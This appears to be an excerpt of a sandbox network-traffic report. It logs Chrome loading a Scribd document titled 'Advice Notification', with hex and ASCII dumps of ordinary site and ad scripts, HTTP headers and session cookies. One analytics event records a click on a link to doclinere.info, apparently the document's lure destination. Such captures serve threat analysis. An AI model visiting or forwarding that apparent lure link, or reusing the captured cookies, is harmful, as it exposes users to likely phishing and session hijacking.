                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:44 UTC16384INData Raw: 62 29 7d 28 29 7d 29 2e 63 61 6c 6c 28 74 68 69 73 2c 6e 28 33 29 29 7d 2c 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 6e 2e 64 28 74 2c 22 62 22 2c 28 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 45 7d 29 29 2c 6e 2e 64 28 74 2c 22 61 22 2c 28 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 68 7d 29 29 3b 76 61 72 20 72 3d 6e 28 32 39 29 2c 5f 3d 6e 28 36 29 2c 6f 3d 6e 28 31 29 2c 69 3d 6e 28 30 29 2c 63 3d 6e 28 34 29 3b 66 75 6e 63 74 69 6f 6e 20 75 28 65 29 7b 72 65 74 75 72 6e 20 75 3d 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 53 79 6d 62 6f 6c 26 26 22 73 79 6d 62 6f 6c 22 3d 3d 74 79 70 65 6f 66 20 53 79 6d 62 6f 6c 2e 69 74 65 72 61 74
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: b)}()}).call(this,n(3))},function(e,t,n){"use strict";(function(e){n.d(t,"b",(function(){return E})),n.d(t,"a",(function(){return h}));var r=n(29),_=n(6),o=n(1),i=n(0),c=n(4);function u(e){return u="function"==typeof Symbol&&"symbol"==typeof Symbol.iterat
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:44 UTC16384INData Raw: 42 41 4c 5f 52 45 57 49 52 45 5f 4e 45 58 54 5f 4d 4f 44 55 4c 45 5f 49 44 5f 5f 2b 2b 7d 72 65 74 75 72 6e 20 66 7d 66 75 6e 63 74 69 6f 6e 20 6c 28 29 7b 76 61 72 20 65 3d 75 28 29 3b 72 65 74 75 72 6e 20 65 2e 5f 5f 24 24 47 4c 4f 42 41 4c 5f 52 45 57 49 52 45 5f 52 45 47 49 53 54 52 59 5f 5f 7c 7c 28 65 2e 5f 5f 24 24 47 4c 4f 42 41 4c 5f 52 45 57 49 52 45 5f 52 45 47 49 53 54 52 59 5f 5f 3d 4f 62 6a 65 63 74 2e 63 72 65 61 74 65 28 6e 75 6c 6c 29 29 2c 65 2e 5f 5f 24 24 47 4c 4f 42 41 4c 5f 52 45 57 49 52 45 5f 52 45 47 49 53 54 52 59 5f 5f 7d 66 75 6e 63 74 69 6f 6e 20 79 28 29 7b 76 61 72 20 65 3d 73 28 29 2c 74 3d 6c 28 29 2c 6e 3d 74 5b 65 5d 3b 72 65 74 75 72 6e 20 6e 7c 7c 28 74 5b 65 5d 3d 4f 62 6a 65 63 74 2e 63 72 65 61 74 65 28 6e 75 6c 6c
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: BAL_REWIRE_NEXT_MODULE_ID__++}return f}function l(){var e=u();return e.__$$GLOBAL_REWIRE_REGISTRY__||(e.__$$GLOBAL_REWIRE_REGISTRY__=Object.create(null)),e.__$$GLOBAL_REWIRE_REGISTRY__}function y(){var e=s(),t=l(),n=t[e];return n||(t[e]=Object.create(null
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:44 UTC16384INData Raw: 29 3b 64 65 6c 65 74 65 20 74 5b 65 5d 2c 30 3d 3d 4f 62 6a 65 63 74 2e 6b 65 79 73 28 74 29 2e 6c 65 6e 67 74 68 26 26 64 65 6c 65 74 65 20 45 28 29 5b 79 5d 7d 66 75 6e 63 74 69 6f 6e 20 6d 28 65 29 7b 76 61 72 20 74 3d 68 28 29 2c 6e 3d 4f 62 6a 65 63 74 2e 6b 65 79 73 28 65 29 2c 72 3d 7b 7d 3b 66 75 6e 63 74 69 6f 6e 20 5f 28 29 7b 6e 2e 66 6f 72 45 61 63 68 28 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 74 5b 65 5d 3d 72 5b 65 5d 7d 29 29 7d 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 6f 29 7b 6e 2e 66 6f 72 45 61 63 68 28 28 66 75 6e 63 74 69 6f 6e 28 6e 29 7b 72 5b 6e 5d 3d 74 5b 6e 5d 2c 74 5b 6e 5d 3d 65 5b 6e 5d 7d 29 29 3b 76 61 72 20 69 3d 6f 28 29 3b 72 65 74 75 72 6e 20 69 26 26 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 69 2e
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: );delete t[e],0==Object.keys(t).length&&delete E()[y]}function m(e){var t=h(),n=Object.keys(e),r={};function _(){n.forEach((function(e){t[e]=r[e]}))}return function(o){n.forEach((function(n){r[n]=t[n],t[n]=e[n]}));var i=o();return i&&"function"==typeof i.
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:44 UTC7524INData Raw: 2c 76 29 2c 6d 28 22 5f 5f 52 65 77 69 72 65 5f 5f 22 2c 64 29 2c 6d 28 22 5f 5f 73 65 74 5f 5f 22 2c 64 29 2c 6d 28 22 5f 5f 72 65 73 65 74 5f 5f 22 2c 62 29 2c 6d 28 22 5f 5f 52 65 73 65 74 44 65 70 65 6e 64 65 6e 63 79 5f 5f 22 2c 62 29 2c 6d 28 22 5f 5f 77 69 74 68 5f 5f 22 2c 52 29 2c 6d 28 22 5f 5f 52 65 77 69 72 65 41 50 49 5f 5f 22 2c 68 29 29 7d 29 2e 63 61 6c 6c 28 74 68 69 73 2c 6e 28 33 29 29 7d 2c 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 6e 2e 64 28 74 2c 22 61 22 2c 28 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 69 7d 29 29 3b 76 61 72 20 72 3d 6e 28 31 29 2c 5f 3d 6e 28 30 29 3b 66 75 6e 63 74 69 6f 6e 20 6f 28 65 29 7b 72 65 74 75 72 6e 20 6f 3d
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: ,v),m("__Rewire__",d),m("__set__",d),m("__reset__",b),m("__ResetDependency__",b),m("__with__",R),m("__RewireAPI__",h))}).call(this,n(3))},function(e,t,n){"use strict";(function(e){n.d(t,"a",(function(){return i}));var r=n(1),_=n(0);function o(e){return o=


                                                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                        137192.168.2.1649875172.217.19.2264436304C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:43 UTC1347OUTGET /pagead/viewthroughconversion/991817613/?random=1733522375967&cv=11&fst=1733522375967&bg=ffffff&guid=ON&async=1&gtm=45be4c40v9178425511z878386455za201zb78386455&gcd=13l3l3l3l5l1&dma=0&tcfd=10000&tag_exp=101925629~102067555~102067808~102081485&u_w=1280&u_h=1024&url=https%3A%2F%2Fwww.scribd.com%2Fdocument%2F801519291%2FAdvice-Notification&hn=www.googleadservices.com&frm=0&tiba=Advice%20Notification%20%7C%20PDF&npa=0&us_privacy=1-N-&pscdl=noapi&auid=1182281480.1733522361&uaa=x86&uab=64&uafvl=Google%2520Chrome%3B117.0.5938.132%7CNot%253BA%253DBrand%3B8.0.0.0%7CChromium%3B117.0.5938.132&uamb=0&uam=&uap=Windows&uapv=10.0.0&uaw=0&fledge=1&rfmt=3&fmt=4 HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                        Host: googleads.g.doubleclick.net
                                                                                                                                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                                                                                                        sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                                                                        sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                                                                                                                                                                                                        X-Client-Data: CIu2yQEIprbJAQipncoBCLbgygEIk6HLAQj2mM0BCIWgzQEIucrNAQiJ080BGMvYzQEY642lFw==
                                                                                                                                                                                                                                                                                                                                                                                        Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                                                                                                                                        Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                                                                                                                        Sec-Fetch-Dest: script
                                                                                                                                                                                                                                                                                                                                                                                        Referer: https://www.scribd.com/
                                                                                                                                                                                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                                                                                        Cookie: IDE=AHWqTUkWUFsQvLQZk-4EI3fKIPjT4lq3O8BPJ3KYlT3sCMuMlsncJozI1dPMcGxO
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:44 UTC703INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                        P3P: policyref="https://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
                                                                                                                                                                                                                                                                                                                                                                                        Timing-Allow-Origin: *
                                                                                                                                                                                                                                                                                                                                                                                        Cross-Origin-Resource-Policy: cross-origin
                                                                                                                                                                                                                                                                                                                                                                                        Date: Fri, 06 Dec 2024 21:59:44 GMT
                                                                                                                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                        Expires: Fri, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache, must-revalidate
                                                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/javascript; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                                                                                                        Content-Disposition: attachment; filename="f.txt"
                                                                                                                                                                                                                                                                                                                                                                                        Server: cafe
                                                                                                                                                                                                                                                                                                                                                                                        X-XSS-Protection: 0
                                                                                                                                                                                                                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                                                                                                                                                        Accept-Ranges: none
                                                                                                                                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:44 UTC687INData Raw: 31 32 66 34 0d 0a 28 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 73 20 3d 20 7b 7d 3b 28 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 68 3d 74 79 70 65 6f 66 20 4f 62 6a 65 63 74 2e 64 65 66 69 6e 65 50 72 6f 70 65 72 74 69 65 73 3d 3d 22 66 75 6e 63 74 69 6f 6e 22 3f 4f 62 6a 65 63 74 2e 64 65 66 69 6e 65 50 72 6f 70 65 72 74 79 3a 66 75 6e 63 74 69 6f 6e 28 62 2c 61 2c 63 29 7b 69 66 28 62 3d 3d 41 72 72 61 79 2e 70 72 6f 74 6f 74 79 70 65 7c 7c 62 3d 3d 4f 62 6a 65 63 74 2e 70 72 6f 74 6f 74 79 70 65 29 72 65 74 75 72 6e 20 62 3b 62 5b 61 5d 3d 63 2e 76 61 6c 75 65 3b 72 65 74 75 72 6e 20 62 7d 3b 66 75 6e 63 74 69 6f 6e 20 6b 28 62 29 7b 62 3d 5b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 67 6c 6f 62 61 6c 54 68 69 73 26 26 67 6c 6f 62 61 6c
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: 12f4(function(){var s = {};(function(){var h=typeof Object.defineProperties=="function"?Object.defineProperty:function(b,a,c){if(b==Array.prototype||b==Object.prototype)return b;b[a]=c.value;return b};function k(b){b=["object"==typeof globalThis&&global
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:44 UTC1390INData Raw: 22 2e 22 29 3b 62 3d 64 2e 6c 65 6e 67 74 68 3d 3d 3d 31 3b 76 61 72 20 65 3d 64 5b 30 5d 2c 67 3b 21 62 26 26 65 20 69 6e 20 71 3f 67 3d 71 3a 67 3d 6d 3b 66 6f 72 28 65 3d 30 3b 65 3c 64 2e 6c 65 6e 67 74 68 2d 31 3b 65 2b 2b 29 7b 76 61 72 20 66 3d 64 5b 65 5d 3b 69 66 28 21 28 66 20 69 6e 20 67 29 29 62 72 65 61 6b 20 61 3b 67 3d 67 5b 66 5d 7d 64 3d 64 5b 64 2e 6c 65 6e 67 74 68 2d 31 5d 3b 63 3d 6e 26 26 63 3d 3d 3d 22 65 73 36 22 3f 67 5b 64 5d 3a 6e 75 6c 6c 3b 61 3d 61 28 63 29 3b 61 21 3d 6e 75 6c 6c 26 26 28 62 3f 68 28 71 2c 64 2c 7b 63 6f 6e 66 69 67 75 72 61 62 6c 65 3a 21 30 2c 77 72 69 74 61 62 6c 65 3a 21 30 2c 76 61 6c 75 65 3a 61 7d 29 3a 61 21 3d 3d 63 26 26 28 74 5b 64 5d 3d 3d 3d 76 6f 69 64 20 30 26 26 28 62 3d 4d 61 74 68 2e 72 61
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: ".");b=d.length===1;var e=d[0],g;!b&&e in q?g=q:g=m;for(e=0;e<d.length-1;e++){var f=d[e];if(!(f in g))break a;g=g[f]}d=d[d.length-1];c=n&&c==="es6"?g[d]:null;a=a(c);a!=null&&(b?h(q,d,{configurable:!0,writable:!0,value:a}):a!==c&&(t[d]===void 0&&(b=Math.ra
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:44 UTC1390INData Raw: 31 29 3b 61 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 61 2e 6f 6e 6c 6f 61 64 3d 6e 75 6c 6c 7d 3b 61 2e 6f 6e 65 72 72 6f 72 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 61 2e 6f 6e 65 72 72 6f 72 3d 6e 75 6c 6c 7d 3b 61 2e 73 72 63 3d 62 7d 3b 76 61 72 20 46 2c 47 3b 61 3a 7b 66 6f 72 28 76 61 72 20 48 3d 5b 22 43 4c 4f 53 55 52 45 5f 46 4c 41 47 53 22 5d 2c 49 3d 78 2c 4a 3d 30 3b 4a 3c 48 2e 6c 65 6e 67 74 68 3b 4a 2b 2b 29 69 66 28 49 3d 49 5b 48 5b 4a 5d 5d 2c 49 3d 3d 6e 75 6c 6c 29 7b 47 3d 6e 75 6c 6c 3b 62 72 65 61 6b 20 61 7d 47 3d 49 7d 76 61 72 20 4b 3d 47 26 26 47 5b 36 31 30 34 30 31 33 30 31 5d 3b 46 3d 4b 21 3d 6e 75 6c 6c 3f 4b 3a 21 31 3b 76 61 72 20 4c 2c 4d 3d 78 2e 6e 61 76 69 67 61 74 6f 72 3b 4c 3d 4d 3f 4d 2e 75 73 65 72 41
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: 1);a.onload=function(){a.onload=null};a.onerror=function(){a.onerror=null};a.src=b};var F,G;a:{for(var H=["CLOSURE_FLAGS"],I=x,J=0;J<H.length;J++)if(I=I[H[J]],I==null){G=null;break a}G=I}var K=G&&G[610401301];F=K!=null?K:!1;var L,M=x.navigator;L=M?M.userA
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:44 UTC1390INData Raw: 73 72 63 7c 7c 28 70 3d 72 29 3b 70 7c 7c 28 70 3d 6e 65 77 20 49 6d 61 67 65 2c 64 26 26 64 5b 66 2e 67 5d 26 26 28 70 2e 6f 6e 65 72 72 6f 72 3d 66 75 6e 63 74 69 6f 6e 28 6c 29 7b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 29 7b 45 28 64 5b 6c 2e 67 5d 29 26 26 65 28 29 7d 7d 28 66 29 29 29 3b 70 2e 6f 6e 6c 6f 61 64 3d 65 3b 70 2e 73 72 63 3d 63 5b 66 2e 67 5d 7d 65 28 29 7d 76 61 72 20 56 3d 5b 22 73 73 5f 22 5d 2c 57 3d 73 7c 7c 78 3b 20 56 5b 30 5d 69 6e 20 57 7c 7c 74 79 70 65 6f 66 20 57 2e 65 78 65 63 53 63 72 69 70 74 3d 3d 22 75 6e 64 65 66 69 6e 65 64 22 7c 7c 57 2e 65 78 65 63 53 63 72 69 70 74 28 22 76 61 72 20 22 2b 56 5b 30 5d 29 3b 66 6f 72 28 76 61 72 20 58 3b 56 2e 6c 65 6e 67 74 68 26 26 28 58 3d 56 2e 73 68 69 66 74 28 29 29 3b
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: src||(p=r);p||(p=new Image,d&&d[f.g]&&(p.onerror=function(l){return function(){E(d[l.g])&&e()}}(f)));p.onload=e;p.src=c[f.g]}e()}var V=["ss_"],W=s||x; V[0]in W||typeof W.execScript=="undefined"||W.execScript("var "+V[0]);for(var X;V.length&&(X=V.shift());
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:44 UTC3INData Raw: 3b 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: ;
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:44 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                        138192.168.2.1649880151.101.2.1524436304C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:43 UTC3064OUTPOST /api/v1/events HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                        Host: wa.scribd.com
                                                                                                                                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 555
                                                                                                                                                                                                                                                                                                                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                                                                                                        sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                                                                                                        sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                                                                        Content-Type: application/json
                                                                                                                                                                                                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                                                                                                                                                                                                        Origin: https://www.scribd.com
                                                                                                                                                                                                                                                                                                                                                                                        Sec-Fetch-Site: same-site
                                                                                                                                                                                                                                                                                                                                                                                        Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                                                                                                                        Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                                                                                                                        Referer: https://www.scribd.com/
                                                                                                                                                                                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                                                                                        Cookie: scribd_ubtc=u%3D77eabba7-56db-4263-a995-14e083c9866b%26h%3Diejk%2BJo6XzI9RrFNqEFB%2Bbr3ZZhyUFte3fWlOGmg%2B7s%3D; osano_consentmanager_uuid=89feed45-6ae7-4319-8c64-0d02839e7716; osano_consentmanager=aXQ2i6CFyu9Ya2Fk9ae1hPJ_A1-fw0x1B_hOIQoAsIBuZhlIHC_A3_sTr7tDq4esf_tDOU-z2kkOOveE3pH_Skvf1x9kVRgn24HjyyFYOyEaLiCxeSsuo281Gqknb0KvJd3JwI6kifAGRELM58SFYbf1IsKt5Liv3nGSbycLsHUSz8ldug_rVMVBEkR7rnSACz1CxtzXVmKYTd-W8WSK_GgqdST_sRn0dUGk0hult4aO24tAJGFIKOyIcutba1UepHRMjVoibRgn8V4WmdU7MJyysuJree9mUa4ufNyQGwokGlGnbB0WCkldrzJ9XCIBAytBvM_awxHImjUGPtM454ardQVFauGTgauP6U4duNCXj2nM-OOJIWwNu40f7VK5ppywZ3_ueMRbBB_qcBmQr2UHoWbNnUSZgS6RmQVdoF7MHo3SDSfez_dzy2wNVUik19LNngI4p9qmvzrib5GRXX386JangWeGRpC6hoyrF-CyA-co2ce_Bm2Rm2Hbae5zIsoXXt8_-VFpP7M17OibOKmcKV2KkYWChyOG0la1vcAis306oDJjmDJ1iOpMYBaO-1LddLBuCWpiO2zm89d1oHYE8R1bNRtp; _gcl_au=1.1.1182281480.1733522361; __CJ_nwt=%7B%22nw2868%22%3A7327%7D; __CJ_parchive_offer=%7B%22avail_height%22%3A984%2C%22avail_width%22%3A1280%2C%22color_depth%22%3A24%2C%22cookie_uuid%22%3A%22b23932ab-7f9 [TRUNCATED]
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:43 UTC555OUTData Raw: 7b 22 64 6f 63 5f 69 64 22 3a 38 30 31 35 31 39 32 39 31 2c 22 65 76 65 6e 74 73 22 3a 5b 7b 22 6e 61 6d 65 22 3a 22 64 6f 63 3a 68 79 70 65 72 6c 69 6e 6b 3a 63 6c 69 63 6b 22 2c 22 76 61 6c 75 65 22 3a 22 7b 5c 22 75 72 6c 5c 22 3a 5c 22 68 74 74 70 73 3a 2f 2f 64 6f 63 6c 69 6e 65 72 65 2e 69 6e 66 6f 2f 76 6e 2f 72 65 2e 68 74 6d 5c 22 2c 5c 22 70 61 67 65 4e 75 6d 5c 22 3a 31 7d 22 2c 22 74 69 6d 65 73 74 61 6d 70 22 3a 22 32 30 32 34 2d 31 32 2d 30 36 54 32 31 3a 35 39 3a 34 31 2e 36 37 39 5a 22 7d 2c 7b 22 6e 61 6d 65 22 3a 22 64 6f 6d 2e 77 69 6e 64 6f 77 2e 62 65 66 6f 72 65 75 6e 6c 6f 61 64 22 2c 22 76 61 6c 75 65 22 3a 6e 75 6c 6c 2c 22 74 69 6d 65 73 74 61 6d 70 22 3a 22 32 30 32 34 2d 31 32 2d 30 36 54 32 31 3a 35 39 3a 34 31 2e 37 33 31 5a
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: {"doc_id":801519291,"events":[{"name":"doc:hyperlink:click","value":"{\"url\":\"https://doclinere.info/vn/re.htm\",\"pageNum\":1}","timestamp":"2024-12-06T21:59:41.679Z"},{"name":"dom.window.beforeunload","value":null,"timestamp":"2024-12-06T21:59:41.731Z
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:44 UTC528INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 40
                                                                                                                                                                                                                                                                                                                                                                                        Content-Type: application/json; charset=utf-8
                                                                                                                                                                                                                                                                                                                                                                                        access-control-allow-credentials: true
                                                                                                                                                                                                                                                                                                                                                                                        access-control-allow-origin: https://www.scribd.com
                                                                                                                                                                                                                                                                                                                                                                                        x-envoy-upstream-service-time: 2
                                                                                                                                                                                                                                                                                                                                                                                        server: envoy
                                                                                                                                                                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                                                                        Date: Fri, 06 Dec 2024 21:59:44 GMT
                                                                                                                                                                                                                                                                                                                                                                                        Via: 1.1 varnish
                                                                                                                                                                                                                                                                                                                                                                                        X-Served-By: cache-ewr-kewr1740051-EWR
                                                                                                                                                                                                                                                                                                                                                                                        X-Cache: MISS
                                                                                                                                                                                                                                                                                                                                                                                        X-Cache-Hits: 0
                                                                                                                                                                                                                                                                                                                                                                                        Vary: Origin
                                                                                                                                                                                                                                                                                                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                                                                                                                                                                        alt-svc: h3=":443";ma=86400,h3-29=":443";ma=86400,h3-27=":443";ma=86400
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:44 UTC40INData Raw: 7b 22 73 74 61 74 75 73 5f 63 6f 64 65 22 3a 32 30 30 2c 22 6d 65 73 73 61 67 65 22 3a 22 73 75 63 63 65 73 73 22 7d 0a
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: {"status_code":200,"message":"success"}


                                                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                        139192.168.2.1649882151.101.194.1524436304C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:43 UTC2809OUTGET /api/v1/events HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                        Host: wa.scribd.com
                                                                                                                                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                                                                                                                                                                                                        Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                                                                                                                                        Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                                                                                                                        Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                                                                                        Cookie: scribd_ubtc=u%3D77eabba7-56db-4263-a995-14e083c9866b%26h%3Diejk%2BJo6XzI9RrFNqEFB%2Bbr3ZZhyUFte3fWlOGmg%2B7s%3D; osano_consentmanager_uuid=89feed45-6ae7-4319-8c64-0d02839e7716; osano_consentmanager=aXQ2i6CFyu9Ya2Fk9ae1hPJ_A1-fw0x1B_hOIQoAsIBuZhlIHC_A3_sTr7tDq4esf_tDOU-z2kkOOveE3pH_Skvf1x9kVRgn24HjyyFYOyEaLiCxeSsuo281Gqknb0KvJd3JwI6kifAGRELM58SFYbf1IsKt5Liv3nGSbycLsHUSz8ldug_rVMVBEkR7rnSACz1CxtzXVmKYTd-W8WSK_GgqdST_sRn0dUGk0hult4aO24tAJGFIKOyIcutba1UepHRMjVoibRgn8V4WmdU7MJyysuJree9mUa4ufNyQGwokGlGnbB0WCkldrzJ9XCIBAytBvM_awxHImjUGPtM454ardQVFauGTgauP6U4duNCXj2nM-OOJIWwNu40f7VK5ppywZ3_ueMRbBB_qcBmQr2UHoWbNnUSZgS6RmQVdoF7MHo3SDSfez_dzy2wNVUik19LNngI4p9qmvzrib5GRXX386JangWeGRpC6hoyrF-CyA-co2ce_Bm2Rm2Hbae5zIsoXXt8_-VFpP7M17OibOKmcKV2KkYWChyOG0la1vcAis306oDJjmDJ1iOpMYBaO-1LddLBuCWpiO2zm89d1oHYE8R1bNRtp; _gcl_au=1.1.1182281480.1733522361; __CJ_nwt=%7B%22nw2868%22%3A7327%7D; __CJ_parchive_offer=%7B%22avail_height%22%3A984%2C%22avail_width%22%3A1280%2C%22color_depth%22%3A24%2C%22cookie_uuid%22%3A%22b23932ab-7f9 [TRUNCATED]
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:44 UTC389INHTTP/1.1 405 Method Not Allowed
                                                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 0
                                                                                                                                                                                                                                                                                                                                                                                        x-envoy-upstream-service-time: 1
                                                                                                                                                                                                                                                                                                                                                                                        server: envoy
                                                                                                                                                                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                                                                        Date: Fri, 06 Dec 2024 21:59:44 GMT
                                                                                                                                                                                                                                                                                                                                                                                        Via: 1.1 varnish
                                                                                                                                                                                                                                                                                                                                                                                        X-Served-By: cache-ewr-kewr1740038-EWR
                                                                                                                                                                                                                                                                                                                                                                                        X-Cache: MISS
                                                                                                                                                                                                                                                                                                                                                                                        X-Cache-Hits: 0
                                                                                                                                                                                                                                                                                                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                                                                                                                                                                        alt-svc: h3=":443";ma=86400,h3-29=":443";ma=86400,h3-27=":443";ma=86400


                                                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                        140192.168.2.1649883157.240.195.154436304C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
